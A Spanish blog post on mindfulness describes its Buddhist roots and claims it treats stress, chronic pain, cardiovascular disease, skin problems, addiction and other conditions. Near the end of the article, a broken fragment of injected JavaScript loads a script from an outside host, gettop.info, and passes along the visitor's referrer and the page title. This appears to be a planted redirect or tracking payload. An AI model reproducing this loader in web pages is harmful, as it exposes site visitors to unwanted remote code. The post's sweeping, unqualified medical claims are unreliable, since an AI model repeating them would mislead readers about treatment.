Salud y belleza » Salud, salud mental

El Mindfulness y la salud física y mental

Sin Comentarios

El mindulness es una práctica oriental que se está introduciendo poco a poco en la medicina psicológica occidental y que consiste en “prestar atención de manera intencional al momento presente, sin juzgar” según Jon Kabat-Zinn. Es una antigua práctica budista que tiene muy buenas aplicaciones en nuestra forma de vida actual, ya que ayuda a las personas a centrarse en vivir el momento y en disfrutar de las pequeñas cosas apreciando la plenitud de cada instante.

mindfulness

El mindfulness puede llegar a ser un fin en sí mismo, una filosofía de vida e incluso un modo de conducirse en la misma. Se trata de una práctica budista que están empezando a seguir cada vez más en occidente y que además se utiliza también como tratamiento para trastornos psicofisiológicos o psicomáticos que no responden a tratamientos convencionales.

El mindfulness ayuda a reducir distracciones y a aumentar la concentración, reduce también los efectos de la ansiedad y del sufrimiento y reduce la impulsividad porque nos ayuda a aceptar la realidad y a disfrutar de cada momento mejorando la autoconciencia de cada uno.

Se suele utilizar el mindfulness también como tratamiento contra el estrés, el dolor crónico, el dolor agudo, enfermedades cardiovasculares, hipertensión, fatiga crónica, problemas de la piel e incluso alteraciones del sueño. Además, esta práctica ha demostrado resultar muy efectiva con trastornos de ansiedad, de personalidad, adicción a las drogas, trastornos de alimentación…

practicar-mindfulness

En el fondo, lo que hace es ayudarnos a desarrollar una actitud más responsable con el cuidado de la salud y a ver el dolor de otra manera, aceptándolo y  centrando la atención en otras cosas que pasan en el presente. El mindfulness nos hace más fuertes psicológica y físicamente y nos ayuda a desarrollar la espiritualidad y tranquilidad en  un mundo que va demasiado deprisa.

Contribuye a recuperar tu equilibrio interno y a mejorar tu capacidad de atención viviendo cada momento como de forma intensa y sin estrés.

¿Crees que la práctica del mindfulness es efectiva?

} else {s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza :

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.